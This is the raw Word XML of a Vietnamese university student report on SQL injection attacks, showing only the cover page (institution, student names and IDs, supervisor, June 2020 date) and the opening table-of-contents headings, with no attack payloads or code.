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418EE" w14:textId="3F7E0BA2" w:rsidR="00506771" w:rsidRDefault="00FD79D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02A8A3FD" wp14:editId="775A85BA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-129540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6112510" cy="9170670"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="11430"/>
            <wp:wrapNone/>
            <wp:docPr id="4" name="Picture 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2510" cy="91706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1911BF1" w14:textId="222AE79D" w:rsidR="00FD79D2" w:rsidRDefault="00246BB5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63042F53" w14:textId="0F91FC09" w:rsidR="00246BB5" w:rsidRPr="009E62E5" w:rsidRDefault="009E62E5" w:rsidP="00246BB5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="007945E1" w:rsidRPr="009E62E5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TRƯỜNG ĐẠI HỌC BÁCH KHOA HÀ NỘI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08241043" w14:textId="77777777" w:rsidR="00FE759D" w:rsidRDefault="009E62E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FE759D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="009E62E5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VIỆN CÔNG NGHỆ THÔNG TIN VÀ TRUYỀN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DD011" w14:textId="24000B00" w:rsidR="00FE759D" w:rsidRDefault="00FE759D" w:rsidP="00FE759D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                     </w:t>
      </w:r>
      <w:r w:rsidR="00EB489B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE759D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47D05">
        <w:sym w:font="Wingdings" w:char="F09A"/>
      </w:r>
      <w:r w:rsidRPr="00D47D05">
        <w:sym w:font="Wingdings" w:char="F09B"/>
      </w:r>
      <w:r w:rsidRPr="00D47D05">
        <w:sym w:font="Wingdings" w:char="F026"/>
      </w:r>
      <w:r w:rsidRPr="00D47D05">
        <w:sym w:font="Wingdings" w:char="F09A"/>
      </w:r>
      <w:r w:rsidRPr="00D47D05">
        <w:sym w:font="Wingdings" w:char="F09B"/>
      </w:r>
      <w:r w:rsidRPr="00FE759D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257A6D51" w14:textId="30B2C176" w:rsidR="00FD79D2" w:rsidRDefault="00FE759D" w:rsidP="00FE759D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7411C818" wp14:editId="693624E5">
            <wp:extent cx="1714500" cy="150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ct.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1714676" cy="1508915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4AA20" w14:textId="327D5141" w:rsidR="00EB489B" w:rsidRDefault="00EB489B" w:rsidP="004934B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Báo cáo bài tập lớn </w:t>
      </w:r>
      <w:r w:rsidR="004934B5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nhập môn An toàn thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA2ED27" w14:textId="6170B008" w:rsidR="004934B5" w:rsidRDefault="004934B5" w:rsidP="004934B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1E0BF5" w14:textId="0E5A9816" w:rsidR="004934B5" w:rsidRDefault="004934B5" w:rsidP="004934B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="C00000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="C00000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Đề tài: Tấn công SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448930B9" w14:textId="5E1F13E7" w:rsidR="0058613C" w:rsidRDefault="0058613C" w:rsidP="004934B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="C00000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F04A53" w14:textId="3EFCCF4C" w:rsidR="00E06ED2" w:rsidRDefault="0058613C" w:rsidP="00832B92">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nhóm Sinh Viên</w:t>
      </w:r>
      <w:r w:rsidR="00E06ED2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidR="00832B92">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E06ED2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nhóm</w:t>
      </w:r>
      <w:r w:rsidR="00C22B06">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D117FC" w14:textId="6F051784" w:rsidR="00721B01" w:rsidRDefault="00721B01" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Thành viên:           </w:t>
      </w:r>
      <w:r w:rsidR="00832B92">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nguyễn Xuân Thành</w:t>
      </w:r>
      <w:r w:rsidR="00832B92">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    20173377</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164160B" w14:textId="23812BBB" w:rsidR="00BC38EF" w:rsidRDefault="00BC38EF" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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t>Hoàng Minh Tiến         20173400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D777376" w14:textId="32743118" w:rsidR="00BC38EF" w:rsidRDefault="00BC38EF" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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t>Nguyễn Phú Vượng      20173473</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C2884" w14:textId="51FB0C62" w:rsidR="00BC38EF" w:rsidRDefault="00BC38EF" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2716E52E" w14:textId="54724EC2" w:rsidR="00BC38EF" w:rsidRDefault="00BC38EF" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">GV Hướng dẫn:    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PGS.TS</w:t>
      </w:r>
      <w:r w:rsidR="00D6191C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.Nguyễn Linh Giang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404457D2" w14:textId="07AE7CBB" w:rsidR="00D6191C" w:rsidRDefault="00D6191C" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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r>
    </w:p>
    <w:p w14:paraId="4BF3D824" w14:textId="64B7BE7C" w:rsidR="00D6191C" w:rsidRDefault="00D6191C" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781379FA" w14:textId="1E3B7158" w:rsidR="00D6191C" w:rsidRDefault="00D6191C" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69780AD1" w14:textId="0211459D" w:rsidR="00D6191C" w:rsidRDefault="00D6191C" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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r>
    </w:p>
    <w:p w14:paraId="6BA859BF" w14:textId="4AB2985A" w:rsidR="00D6191C" w:rsidRPr="00BC38EF" w:rsidRDefault="00D6191C" w:rsidP="00721B01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Hà nội, ngày 7 tháng 6 năm 2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A79A1D" w14:textId="77777777" w:rsidR="00FE73A5" w:rsidRDefault="00E06ED2" w:rsidP="00785D75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-495182822"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="6DCDDF39" w14:textId="6CD93A4F" w:rsidR="001D6862" w:rsidRPr="002375BC" w:rsidRDefault="002375BC">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002375BC">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Mục lục</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="28B00275" w14:textId="0FA19C19" w:rsidR="00357678" w:rsidRDefault="00150873">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-5" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc42895589" w:history="1">
            <w:r w:rsidR="00357678" w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. SQL injection Overview</w:t>
            </w:r>
            <w:r w:rsidR="00357678">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00357678">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00357678">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895589 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00357678">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00357678">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00357678">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00357678">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="035B1D8C" w14:textId="7C351FB1" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895590" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1. Giới thiệu về SQL injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895590 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59892B92" w14:textId="5A31B2B8" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895591" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2. Mức độ nguy hiểm của SQL injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895591 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E596437" w14:textId="4616AA7F" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895592" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Các dạng tấn công SQL injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895592 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
